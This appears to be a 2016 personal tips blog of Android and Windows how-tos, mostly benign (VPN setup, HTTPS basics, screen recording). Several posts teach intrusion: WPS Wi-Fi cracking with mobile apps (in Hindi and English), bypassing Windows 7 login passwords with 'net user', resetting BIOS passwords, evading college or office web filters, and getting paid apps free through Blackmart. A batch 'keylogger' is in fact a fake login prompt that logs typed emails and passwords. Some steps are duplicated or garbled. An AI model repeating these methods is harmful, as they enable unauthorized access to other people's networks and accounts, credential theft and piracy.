Friday, 18 November 2016

Tips To Keep Your Android Device Safe and Sound

Set A Screen Lock:

Make your device secure by adding a screen lock with a Pattern,PIN or Password.

Just go to Settings –> Security –> Screen Security –> Screen Lock

-----------


Back Up Your Data:

In case you end up losing your device or it gets stolen or damaged, Backups may just prove to be the saving grace.
To save backup your photos and videos you could use the Auto Backup facility to back them up to Google+.

Simply go to Google Photos –> Settings –> Auto-Backup

------------

Encrypt Your Device:

Encryption shall come in handy in case you lose your device. Make sure your device is running Jelly Bean (Android 4.1+).

Go to Settings –> Security –> Encryption –> Encrypt phone

-----------

2-Factor Authentication:

In case someone has access to your password try using this feature which uses a password and a code generated by the phone to prevent unauthorized access thereby providing your phone with an extra layer of protection.

----------

Download Apps From Trusted Sources Only:

It is advisable to download applications from the Google Play Store only as they are all tested for harmful behaviour and undergo stringent policy checks before being posted there. Apps downloaded from harmful sources can even result in you being charged some hidden fee or disclosing your personal information to hackers.

-----------

Enable Android Device Manager:

One of our biggest fears today would be losing our Android device and with it all the precious data that we might have been holding in it for years. But do not fret, the wonderful features of Android Device Manager such as “Remotely locate this device”, “Allow remote lock and erase” and “Find My Phone” provide the perfect remedy for such a situation.

--------------

Add Your Contact Information To Your Lock Screen:

You can add some personal contact information on the lock screen in case you lose your Android phone and some stranger ends up finding it.

------------

How To Set-up VPN on Android Devices

Step 1. Go to Menu > Settings



Step 2. Now Click on More



Step 3. Now click on VPN and a screen like this one would open up:



Step 4. Now tap on the ‘+’ button at the right corner of the screen:



Step 5. Here enter a Name for the VPN connection, select the type of VPN server you are connecting to and enter the VPN server’s address and then click save.



Step 6. Now just tap on the created VPN to connect. You will be prompted to enter a username and password. After entering which you can connect to the VPN.



Once you are connected you will see a Key Icon / “VPN activated” notification in the notification drawer. In case you want to disconnect, simply tap on the notification and tap Disconnect.

Bonus Tip: In case you want to ensure that your data is always sent over a VPN, for instance while using a public Wi-Fi network all you need to do is this:

Connect to a VPN, save your account information and then click on the three dots icon at the corner of the screen. After that click on the ‘Always-On VPN’ icon to access this feature.

What is VPN (Virtual Private Network)? How it Works?




VPN is a technology used to setup a private network over the internet to share the resources of a corporate intranet with remote users and other office locations of the company.


----------

How it works?

The working of VPN is not a tough deal to understand, though it is. But, before that, you need to get an idea about the protocols or set of rules in laymen terms, used by VPN in providing a secure personal network.

SSL (Secured Socket Layer): It uses a 3-way handshake method for assuring proper authentication between the client and server machines. The authentication process is based on cryptography where certificates behaving as cryptographic keys already stored in the client and server, are used for initiating the connection.

IPSec (IP Security): This protocol can work on transport mode or tunnelling mode, so that it can do its job of securing the VPN connection. The difference between the two is, transport mode only encrypts the Payload in the data i.e. only the message present in the data, whereas tunnelling mode encrypts the whole data to be transmitted.

PPTP (Point-To-Point Transfer Protocol): It connects a user located at some remote location to a private server in a VPN network, and also uses the tunnelling mode for its operations. Its low maintenance and simple working makes it the most widely adopted VPN protocol, further credit goes to the inbuilt support provided by Microsoft Windows.

L2TP (Layer Two Tunnelling Protocol): It facilitates the tunnelling of data between two geographical sites over the VPN network, often used in combination with the IPSec protocol which further aids to the security layer of the communication.

-------------


Setting up a VPN Connection involves Three Phases:

Authentication: In this phase, data packets are first encapsulated, basically wrapped inside another packet and some headers and other stuff are attached, all done to conceal the identity of the data packets. Now, your device initiates the connection by sending a Hello request to the VPN server, which replies with an acknowledgement and asks for the user credentials to clarify the authenticity of the user.

Tunnelling: After the authentication phase is finished, what we say, an imaginary tunnel is created which provides a direct point to point connection through the internet. We can send whatever data we want to via that tunnel.

Encryption: After we’ve successfully created the tunnel, we can send whatever information we want to, but that information is still not safe if we are connected to a free VPN service, which is also used by other people. So, we encrypt the data packets before sending them over the tunnel, thus barring any other user to peep into our packets, as he will only see some unrecognisable rubbish data flowing through the tunnel.

------------

Pros and Cons:

The biggest advantage of using a VPN is the cost effectiveness it facilitates in providing a single private network in comparison to using separate leased lines which can burn the pockets of corporate firms. All credited goes to the internet, for acting as the medium for uninterrupted VPN connections.

Apart from all the good things VPN does for us, it has its weak sides too. Not having a streamlined procedure for ensuring Quality of Service (QoS) over the internet, is the biggest incapacity VPN technology has in its possession. Furthermore, the level of security and authenticity outside the private network is beyond the purview of VPN technology. The incompatibility between different vendors only adds to its bunch of drawbacks.

Thursday, 17 November 2016

How to hack wps wifi network using Android phone in Hindi

ऐसे करें वाई-फाई पासवर्ड हैक
1. इसके लिए आपको सबसे पहले गूगल प्ले स्टोर से WPSPIN एप डाउनलोड कर इंस्टॉल करनी है.
2. इंस्टॉल होने के बाद एप को ओपन करें.
3. यह एप अपने आप ही WPS वायरलैस नेटवर्क को ढूंढ लेगी.
4. अब जिस भी वाई-फाई के पासवर्ड को आप हैक करना चाहते हैं उसपर क्लिक कर दें.
5. क्लिक करते ही आपके पास 8 नंबर का पिन आएगा उसे नोट करें.
6. इसके बाद अपना लैपटॉप ओपन करें. अब लैपटॉप में वाई-फाई ऑन कर 8 नंबर का पिन डालें, जो आपने नोट किया है.
7. इसके बाद आप वाई-फाई चला पाएंगे.
8. ये तरीका सिर्फ WPS वाले राउटर में ही काम कर सकता है.

Wednesday, 16 November 2016

How to shutdown your pc using a c-program

If you are on windows 7 and above (type this codes in c )



#include
#include

int main()
{
   system("C:\\WINDOWS\\System32\\shutdown /s");

   return 0;
}


###########################------------------########$$$$$$$$$$$$$

If still use ancient windows XP (than type this)



#include
#include

int main()
{
   char ch;

   printf("Do you want to shutdown your computer now (y/n)\n");
   scanf("%c", &ch);

   if (ch == 'y' || ch == 'Y')
      system("C:\\WINDOWS\\System32\\shutdown -s");

   return 0;
}

How to make your computer system auto shutdown:

Step1. Click on Start and search Notepad. Open your notepad and start typing;



shutdown -s -t 60


Note: 60 means 60 seconds that is after 1-minute computer will shutdown, you can set as per your timing, if you want to shutdown your computer after one hour from the time you double click on that file, then 60 seconds = 1 minute and 60sec x 60minute = 3600, mean your computer will shutdown after one hour.

Note: Only and after double click on that file means your shutdown countdown started.

Step2. After writing the code on your notepad now just save your notepad but clicking on the file and select Save as option


Save your Shutdown File

Step3. just rename your file name as per your desire but at the end of the name put .bat, suppose your file name is CodingSecurity then it should look like CodingSecurity.bat at the time of renaming your file, and then Select All Files from Save As Type, Now click on Save.

How To Convert Text Into Audio Using Notepad

STEP 1: Open Notepad. You can do this by searching for Notepad in the windows search Or Press Win+R and type Notepad and Press Enter.

STEP 2: Now, Copy following program and paste it in Notepad–


Dim message, sapi
 message = InputBox("A Best Text to Audio converter"+vbcrlf+"From - www.allusefulinfo.com","Text to Audio converter")
 Set sapi = CreateObject("sapi.spvoice")
 sapi.Speak message



STEP 3: Now lets save the code we entered above. The code has to be saved in .vbs format rather than standard .txt format.

STEP 4: Now just double click on the saved file and Enter the text you want to hear in the text box. The moment you click OK , You can hear the text you entered as Audio.

Monday, 14 November 2016

How to find IMEI number if you’ve lost the phone

You can always check your retail box and bill because both have the IMEI number written on them.

In the extreme cases if an Android user lost his retail box and bills too, he/she can try this method.

First sign in to the Google Dashboard using your Google account which is linked to the lost Android phone. Now just click the Android logo and it will show you all the devices connected to that Google account along worth their IMEI numbers.

Saturday, 12 November 2016

How to Locking Folders

Follow these steps


you want to lock a folder named XaaX in your E:\, whose path is E:\XaaX.
Now open the Notepad and type the following

[code]ren xaax.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]

Where xaax is your folder name. Save the text file as loc.bat in the same drive.

Open another new notepad text file and type the following


[code]ren xaax.{21EC2020-3AEA-1069-A2DD-08002B30309D} xaax[/code]


Save the text file as key.bat in the same drive.


Steps to lock the folder:

To lock the xaax folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.

To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.

How to CracK BIOS Password

>Open the CPU
>Observe the Motherbord
>Remove the Silver Battery(3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period " . "
Then press Enter

If your PC is hanged then do this

Press shift+ctrl+esc or ctrl+alt+del
And then click on 'END TASK'
Your PC is runing now.

How to Increase the speed of your file sharing

Simple Way to Share Multiple Folders :

Goto Run and Type SHRPUBW.EXE
then press Enter
Select the folder you want to share and Set permissions,

your share folder is ready now.....

##### thanks

Thursday, 10 November 2016

How To Send Encrypt Facebook Messages With Secret Conversations Using Messenger

Step 1:
 Click on the profile section, which is the person icon on the upper right of the screen. Make sure the Secret Conversations slider is activated.

Step 2:
Choose the contact you want to start an encrypted conversation with in messenger. Now click Secret conversation which will bring you to new tab.

Step 3:
Now your screen will turn to black theme, and you’re ready to go.



Note: To view an open secret conversation thread just choose it from the list of open message threads on the main screen of the app.

Secret Conversations work almost like regular Facebook messages but not quite. You can send text, emoji, stickers, and pictures; however, gifs, videos, voice calling, and payments are not supported.

Wednesday, 9 November 2016

How To Recover Deleted Photos Files from Android Phone

Steps To Recover Deleted Photos Files from Android Phone


#1 First of Download a free software to our windows system link available below. Today in internet lots of available software but Dr Fone for Android are best software for recover photos and other deleted files from android phone.

#2 Once you download Dr fone for Android to your windows system after click on install button and wait up to successfully install in your windows system.



#3 Connect Android phone to Windows system: Now first important thing you must do is to connect your Android phone to Windows system through USB cable.



#4 Enable USB debugging: Once you have connect Android phone to windows system now you have to do it Enable USB debugging. See settings below.



1. For Android 2.3(Gingerbread) or earlier versions: tap Settings > Applications > Development > check USB debugging.

2. For Android 3.0 to 4.1(Ice Cream Sandwitch): tap Settings > Developer options > check USB debugging.

3. For Android 4.2 (Jelly Bean) or later versions (Lollipop): tap Settings > About Phone > tap Build number for about 7 times until getting the note “You are under developer mode”. Go back to Settings > click Developer options > check USB debugging.

And Same for above version of Android Like kitkat, lollipop, Marshmallow etc.

#5 After enabling USB debugging on the Android phone, Dr.Fone for Android (Software) will recognize your device automatically. And then, you should click Next to let the program analyze the data on your device. To make it work properly, please make sure there is at least 20% of battery for the phone.



#6 Choose File Type and Scan Mode: To save your time for the scanning process, after you click Next, you’ll be asked to select the file type to scan. Now click on Gallery for recover your images. After tap on next button.

#7 The whole scanning process will last a few minutes. During the process, if you have seen the deleted photos you need, you can click the Pause to stop the process. After then, check the wanted photos and click Recover at the bottom of the program. In the new pop-up window, select a folder on your local drive to save the recovered the deleted photos on Android device.

How to download YouTube videos on your iPhone IOS9

Step 1: Download and install “Documents 5” app from AppStore.

Step 2: Open Documents 5 app and tap on browser.Once you open the browser, enter en.savefrom.net on the URL tab.

Step 3: Now paste the YouTube URL and get the download link. You’ll see the videos in the Downloads section of the Documents 5 app.

Step 4: To save this video to your iPhone or iPad’s Camera Roll you need to hold on the video and drag it up until you see the folder list > Photos and then into Camera Roll.



Note: Choose the video quality before you download a video from en.savefrom.net.

How to unroot Android using Universal unroot app

You can check the Root Checker app to confirm if you’ve successfully unrooted your Android smart phone.


But this is a paid-for app, which costs $1 on Google Play Store. Download and install Universal unroot app and click the “unroot” button and then “Yes“.

 ###### How to download paid apps from Google Play for free-------------  Blackmart alpha (it's a free of cost )

How to Install Linux On Your Android Phone

Let’s get started with installing Linux on Android phone:

Step 1: Installation of GNURoot from Play Store.

Step 2: Select the helper app of a Linux distro

Step 3: Select the Linux distro and launch

Step 4: It’s ready to use

 

 

 

 

 

 

Monday, 7 November 2016

Difference between HTTP and HTTPS

What is HTTP

It is always necessary to know something about basics before going to the advanced topics. HTTP stands for HyperText Transfer Protocol. It is the system for transmitting and receiving information across server and the client. The Server is the machine where your website code is placed and client is nothing but your browser. HTTP manages the mutual understanding between server and the client to exchange information or data successfully. The first HTTP had only one method called as GET, which would request a page from server and the response was a HTML page. The latest version of HTTP defines nine request methods.

If you visit any website you may see the address gets prefixed with HTTP:// this means your browser is now connected to the server using HTTP. Now the HTTP isn’t the safest way to establish a connection, the problem with http though is that it is vulnerable to people who might want to eavesdrop or see what your activity is all about.



What is HTTPS

HTTPS or Secure HTTP some may call it is a combination of Hypertext Transfer Protocol (HTTP) with SSL/TLS protocol. Now everything you communicate over HTTPS will be sent and received in encrypted form, which adds the element of safety.
As when a client makes a request to the server, the server responds by offering a list of encryption methods. When the client connects to a website via HTTPS, the website encrypts the session with a digital certificate. Secure Sockets Layer or SSL uses a cryptographic system that encrypts data with two keys that is browser and server send each other unique codes which are used for encryption for rest of the talk.

Https is used in many situations, such as log-in pages for banking, forms, corporate logins, and other applications in which data needs to be secured. It is always advised to never enter credit card details on websites that run on HTTP.



Difference between HTTP and HTTPS

1)      In case of HTTP URL begins with “HTTP://” and for HTTPS connection it is “HTTPS://”

2)      HTTP is unsecured on other hand HTTPS is secured.

3)      HTTP uses port 80 for communication unlike HTTPS which uses port 443

4)      No certificates required for validation in case of HTTP. HTTPS requires SSL Digital Certificate

5) No encryption in HTTP; Data encrypted before sending and receiving in HTTPS.

How to Break Windows7 Password

 Break Windows 7 Login Password with Command Prompt

Step 1: Restart your Windows 7 computer and hold on pressing F8 to enter Advanced Boot Options.

Step 2: Choose Safe Mode with Command Prompt in the coming screen and press Enter.

Step 3: In pop-up command prompt window, type net user and hit Enter. Then all Windows 7 user accounts would be listed in the window. Just find the login user which ever appeared again and again on Windows 7 logon screen.

Step 4: Remove the Windows 7 login user password with net user command.  using this command......

net user techideas *

step 5 : press Enter button three times. Then Windows 7 login user password would be removed. Restart computer and you could bypass Windows 7 login password to sign in. 



 


How to make Google Chrome Faster


  
1. Chrome://flags/     
type in the search bar .

2. press enter.

3. search for number of raster threads and set it to 4.

4. search for fast tab/window close and enable it.

5. search for enable touch events  and switch from automatic to enable.

6. search for override software rendering list select enable it.

7. search for smooth scrolling and enable it.

8. RELAUNCH NOW at last .

all done..................
 


Saturday, 5 November 2016

How to Download Your Favorite Website for Offline Access

Follow these steps to download a website for offline viewing using HTTracks:

Download HTTracks:-
https://www.httrack.com/page/2/en/index.html


1. Click Next on the welcome page.

2. Type Project and Category name (choose any name as per your liking) in the field and click Next.

3. From the drop-down menu in front of Action, select Download web site(s). In future, if you want to update the downloaded data, select Update existing website and follow the rest.

4. Click Add URL and type the website address.

5. Click Set Options. Untick use proxy for ftp transfers check box. Click Ok.

6. Click Next, followed by Finish.

7. Now the website download process will start.


Browsing The Downloaded Website:---------

1. Navigate to C drive or whichever drive you have saved the website.
2. Open My Web sites.
3. Open the folder of the offline website you want to browse.
4. Open the index file. Make sure the index file uses the Chrome (or any web browser) as the default application.

Screen Recording Software For Windows

1.CamStudio (Free)
CamStudio is used widely for recording screen and capturing.


2.Ezvid (Free)
Ezvid is a screen recording software with an in-built video editor where you can split your recordings and you can add text and slip your recordings and create a slideshow effect and speed control. Using this software you can upload your video directly to YouTube.


3. Jing (Free)
Jing allows you to capture video, animation and images and share them on internet. In jing we can create short keys to make things quicker.


4.Screenr (Free)
 It is a free online tool where you can record your screen without installing any software on online. It requires Java and you can record upto 5mins maximum.

5. Rylstim Screen Recorder (Free)
Rylstim Screen Recorder is simple software that just records your screen after you hit “Start Record” This software does’nt record input device like microphone.


6.Camtasia Studio (Paid) (Free Trial Version only)
Camtasia studio best paid software for screen recording or screen capturing. You can even import videos, music, photos and customize according to your need. You can even export your video or upload your video directly to YouTube.

7. Webinaria (Free & Open Source)
Using this software you can create Flash(AVI to FLV) recordings of your desktop, record microphone with your presentation or demo and even save or edit your recordings to add voice, webcam or text.

8.FRAPS (Paid) (Free Trial Version Only)
FRAPS is widely used by gamer’s to record game play. Fraps can capture audio and video upto 7680×4800 with custom frame rates from 1 to 120 fps (Frames per second). In Fraps we have hotkeys to record screen. It also used for recording movies at great quality.


 9.ActivePresenter (Free + Paid)
Active Presenter is similar to other screen recording softwares. You  can add voice, call-outs, annotations, videos and graphics. You can export your video to website,desktop,mobile device.

10.Icecream Screen Recorder (Free)
Icecream screen recorder a free tool to record your screen as a screenshot or a video. Easy to use and can record Skype video in HD and record webinars and games. 

How to create a keylogger in notepad


@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit




Step 1: Now paste the above code into Notepad and save it as a Logger.bat file.

Step 2: Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.)

Step 3: Drag that folder in to the C:

Step 4: Test out the Logger.bat  .




Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.

How To Download YouTube Videos Using VLC Media Player

1. opening some YouTube video and copying its URL from your web browser’s address bar.

2. Now you need to open VLC media player on your computer.

3. In VLC, find the Open Capture Device option and click on it. It should open a new window.

4. Now click on the Network tab and paste the copied URL in the empty field that’s titled Please enter a network URL. Now click Play button.

5. This should soon start playing the YouTube video in your VLC media player.

6. Now, in Tools option, click on Codec information.

7. It’ll open the Current Media Information window that’ll show codec information. There’ll be a link under Location. It’s basically the download link and you need to copy it.

8. Now you need to open your web browser and paste the copied download link in the address bar and hit Enter. This would either start the video playback in your web browser or directly show you the download dialog. Simply click on the Save button to grab the video.

###### 

Thursday, 3 November 2016

How To Unlock Windows Computer From Android

Step1.
From Computer, Download and install Rohos.

http://www.rohos.com/download    ------- download link here.......

Open it, Select Options, from Options, select all the three option Firstly select Mobile Phone, Secondly select Lock Computer, Thirdly select For Any User. All done just click on OK.

Step2.
Now select setup a Key. Enter your desired password, soon after you put password you will see a QR Code, and that QR Code you need to scan it from your smartphone using that application as mention to the top of the steps.

Step3.
Maybe to scan the QR code the Android application will ask you to download a new QR code scanner from Google play store and for that, you need to download that scanner too. Make sure to turn your WiFi/Bluetooth to connect your computer, and as soon as you scan your QR code from your computer your smartphone will be connected with your computer and you can use only your smartphone to Lock or Unlock your computer.



Note: Once you connected your mobile with a computer application Rohos, then from the next time you can use your mobile to lock or unlock your computer, TO UNLOCK YOUR COMPUTER YOU DON’T NEED TO TYPE ANY USER NAME OR PASSWORD, JUST USE YOUR SMARTPHONE.

######It is also use MAC and IOS user.

How to Display Your Android Mobile Screen to Window PC 2nd method

The most popular application for the computer as well as a smartphone is TeamViewer, millions of the computer users still use Teamviewer to remote control another computer, but today we can use this application to remote control our smartphone from a computer as well as we can screencast our device – playing games.

Step1:
Download and install Android application TeamViewer QuickSupport from Google Play Store.

Step2:
Now download and install TeamViewer on your computer.

Step3:
Open your Android TeamViewer and copy your ID.

Step4:
Paste your ID on your computer TeamViewer application.

Step5:
Now see your smartphone you will be prompt to remote support your Android device, click on Allow. All done now you can see your smartphone screen on your computer.



How to Find and Remove Duplicate Files on Windows

Duplicate file use your harddisk  drive unwanted free space we will be remove unwanted file

dupeGuru is an awesome application for this purpose. It is completely free and comes in three styles: dupeGuru Music Edition, dupeGuru, and dupeGuru Pictures Edition. The pictures and music editions are specific for  finding similar pictures and music files.

The interface is simple, and easy to use. Just open it, add a few folders or drives you want to scan, and click Scan. You will see a list of copies of files, from which you can select and delete the files to remove. 

Best Android Apps that provide security for your phone

Lookout:-
Lookout Mobile Security backup contacts such as scheduling automatic backups, which can later be accessed online. Lookout can secure you from unsecure WiFi networks, fraudulent links, malicious apps, etc.

Snap Secure:-
Snap Secure comes along with anti-virus as well as anti-spyware protection. It can also scan your new applications for malware. Calls from unknown or un-shown numbers and also unwanted SMS messages on Android devices can be easily blocked.

Avast Free Mobile Security:-
The Avast Free Mobile Security App includes a wide spectrum of anti malware as well as anti-theft features. Also included is browsing protection.

ESET Mobile Security & Antivirus:-
The ESET mobile security basic version is completely free and it also includes a set of anti-theft tools. With ESET Mobile Security and Antivirus, it is also possible to remotely locate as well as lock your Smartphone or tablet.

Avira Antivirus Security:-
The Avira Antivirus Security for Android phones provides 100% detection rate along with no false positives.

BullGuard Mobile Security:-
BullGuard Mobile Security is a premier quality mobile security app that provides you with an online account so that you can remotely access your smart phone. You are also provided with a mobile security manager that works in tandem with your GPS, so in the case you lose your device, it can be easily locked remotely and can be wiped clean.

Cerberus Anti Theft:-
This is a free anti-theft app that includes many features which you can use for finding your lost or stolen device. With a standard web interface that you can see your device’s location, you can lock the device; hide the app from the app drawer, so that people will not know it exists.









How to Record Screen in Windows 10 with Audio

My dear friend here I'm tell how to record your desktop screen with audio both so let's go to know how can you do this...........

1. First run the Xbox app which you can locate from start menu.

2.With the Xbox app running, jump to the app you want to record and press the ‘Windows’ key with the letter ‘G’ (Win + G)which opens the Game Bar.


3.Tell the Xbox recording app that you want to open the Game Bar by telling it a small white lie that the app you want to record is, indeed, a game.

4.Once the Game Bar is loaded choose your action, either Screenshot (for a single image capture) or Start Recording (for capturing video).


Some shortcut keys here:-
Win+Alt+PrtScn – Screen capture
Win+Alt+R – Screen recording





When recording it done, you can find the completed recording file in File Explorer, underThis PC\Videos\Captures\.

How to Display Your Android Mobile Screen to Window PC

Today i'm going to tell how to display your mobile phone to your PC so let's begin........


Step1:
Download and install AllCast Application from Google Play store to your Android device.Download and Install AllCast Receiver extension for your computer’s Google Chrome Browser from Google Chrome App Store.

Step2:
Download and install Mirror Beta on your computer from Google Play store.

Step3:
After all application downloaded, just open AllCast Receiver from your Google Chrome Extension, Located under the drop-down menu of your Chrome and you can see extension option under More Tools. Enable your AllCast receiver extension.

Step4:
Open your Mirror Beta follow the instruction.

Step5:
Open your AllCast on your Android and it will connect to your chrome browser automatically.


Screenshot on Windows 10 Without Print Screen

#Use the Snipping Tool

This is a very easy thing to do. Windows comes with a pre-installed tool called the Snipping Tool.

#free screenshot tool software use


Wednesday, 2 November 2016

How To Remove Virus From USB Or Any Drive Using CMD

Some of the well-known examples of the above kinds of the viruses are:
  • Autorun.inf
  • Ravmon.exe
  • New Folder.exe
  • svchost.exe



remove a virus using cmd, we will use a famous cmd command called ‘attrib‘ command.

Here are the basic attributes of the ‘attrib’ command which we will use later:
  • R – R represents the “Read-only” attribute of a file or folder. Read-only means the file cannot be written or executed.
  • H – H stands for the “Hidden” attribute.
  • A – Similarily,  A stands for “Archiving” which prepares a file for archiving and,
  • S – S attribute changes the selected files or folders into a system file from a user file by assigning the “System” attribute to that particular file.


  • ############# follow these steps ############



  • Run command prompt as an administrator
  • Select drive which you want to drive to remove viruses and press enter.
  • type attrib and press enter. 
  • attrib -r -a -s -h *.* and press Enter.
  • Done.



How to Hide Any Drive in Windows Using Command Prompt

  • Open command prompt with ‘Run as administrator’ permissions.
  • Type the command “Diskpart” in your command prompt. If any popup appears then, just press yes and it will open up a new window in your command prompt 
  • Then type list volume and you can see that all the volumes are listed down after your press enter.
    Looking closely, you can see that all the volumes have a volume number like 1, 2, 3, 4 etc. and each volume is assigned a letter such as C, D, E, F etc.
  • Now type select volume 4 and press enter. (Your volume number could be different )
  • Type remove letter F in our command prompt.
  • And it’s done. The selected drive has been hidden successfully. 

Tuesday, 1 November 2016

HOW TO HACK WPS WIFI NETWORK WITH MOBILE


 Note :- educational purpose only
... We're not responsible any criminal activity......

Before Proceeding To The Steps  Make sure your phone  meets all the requirements below:-
  • Your Phone Should be rooted.
  • Your Phone should be charged at least upto 50%.
  • Signal of the Wi-Fi whose security you`re going to check must be strong.


  •  Open Google Play Store And Search For WPS Connect and download it.
  • After downloading WPS Connect install it.
  •  After installing the app, Go to Wi-Fi settings and then turn on the Wi-Fi.
  •  Open WPS Connect and then Click On Scan Button.
  •  After the scanning process is completed and you can see many list of Wi-Fi Connections available.
  • After downloading WPS Connect install it.
  •  After installing the app, Go to Wi-Fi settings and then turn on the Wi-Fi.
  •  Open WPS Connect and then Click On Scan Button.
  •  After the scanning process is completed and you can see many list of Wi-Fi Connections available.

HOW TO ACCESS BLOCKED WEBSITES IN COLLEGE AND OFFICES

Method 1:
Changing the URL
1)Example if want to browse http://www.sandwichbite.com/
2)So now to browse the Site And you have to change HTTP:// to https://
3) Like this https://http://www.sandwichbite.com/
If this method doesn’t work then Skip to Second.




Method 2:
Method 2:
Using proxy Servers
Here are the list of proxy Servers.
www.my-proxy.com
www.anoymizer.ru
www.blockedsiteaccess.com
http://4freeproxy.com/ etc.
Go to any site.
Enter the website link in URL box that you want to surf.



Method 3:
Using VPN.
VPN Stands for Virtual private Network they are many free VPN.
1) Search for best and free VPN in google search engine.
2) Choose a VPN Trial or Buy it.
3) Download it and install in PC.
4) Just enter the sites that you want to surf.

ANDROID useful code

1. To Know Complete Information About your Phone
Dial this number/code: *#*#4636#*#*
It gives you information about –
– Phone
– Battery
– Battery history
– Usage statistics
2. To Factory data reset
The following number/code will be used: *#*#7780#*#*
Dialing this code will give you a prompt that will have the ‘Reset phone’ button. If you don’t want to reset, then press cancel. If you choose to reset then the following data is removed,
– Google account settings
– System and application data and settings
– Downloaded applications
The following data is not removed:
– Current system software and bundled application
– Files on your SD card, like photos, music etc.
3. Format Android Phone
Number/code: *2767*3855#
This code formats your Android device, so do it only if absolutely necessary. The code is used in order to perform a factory format on your device and removes all settings and files, including the internal memory storage. It reinstall’s the phone’s firmware and there is no way to cancel this operation, except removing the battery from the device.
4. Phone Camera Update
Number/code: *#*#34971539#*#*
This code will give you information about the camera on your phone. The following four menus are shown,
– Update camera firmware in image
– Update camera firmware in SD card
– Camera firmware version
– Firmware update count
Using the ‘Update camera firmware in image’ option has been known to make your camera stop working, so it is advisable to not choose that option.
5. End Call/Power
Number/code: *#*#7594#*#*
This code allows you to manipulate the function of the power on/off/lock button on your smartphone. Instead of getting the options for silent mode etc. you can choose to make it turn off the power directly.
6. File Copy for Creating Backup
Number/code: *#*#273283*255*663282*#*#*
This is a very useful code that lets you backup your images, media files, video, voice memo etc. You will get a file copy screen allowing you to backup images.
7. Service Mode
Number/code: *#*#197328640#*#*
The idea behind entering the Service Mode is that you can run various tests on your device using this.

8. WLAN, GPS and Bluetooth Test Codes:
There are various codes that you can use for this one.
– *#*#232338#*#* – Shows WiFi MAC Address
– *#*#1472365#*#* – GPS Test
– *#*#1575#*#* – Another GPS Test
– *#*#232331#*#* – Bluetooth Test
– *#*#232337#*# – Shows Bluetooth Device Address
9. Codes to get Firmware version information:
The following codes provide the firmware information about your device.
– *#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate
– *#*#1234#*#* – PDA and Phone
– *#*#1111#*#* – FTA SW Version
– *#*#2222#*#* – FTA HW Version
– *#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number
10. Codes to launch various Factory Tests:
There are various other factory tests that you can run on a smartphone.
– *#*#0283#*#* – Packet Loopback
– *#*#0*#*#* – LCD test
– *#*#0673#*#* OR *#*#0289#*#* – Melody test
– *#*#0842#*#* – Device test (Vibration test and BackLight test)
– *#*#2663#*#* – Touch screen version
– *#*#2664#*#* – Touch screen test
– *#*#0588#*#* – Proximity sensor test
– *#*#3264#*#* – RAM version

HOW TO BLOCK A PERSON ON FACEBOOK WHO HAS ALREADY BLOCKED YOU

  • Login To Your Facebook Profile and open Facebook settings or click here.
  • Click on Blocking Section and then go to Block User.
  • Click on the add name or email box.
  • Type the person name in the box who has already blocked you and press enter.
  • Now a popup will appear, find the person who has blocked you there.
  • After searching, click on block button and the person will be blocked.


All done now you have successfully blocked the person who has already blocked you.Hope it will help you….



####  THANKS SO VISIT AGAIN 

General PC Tips

  Adjust any setting on your PC with the Windows “God Mode” folder, which is a centralized Control Panel for all the OS settings. Access thi...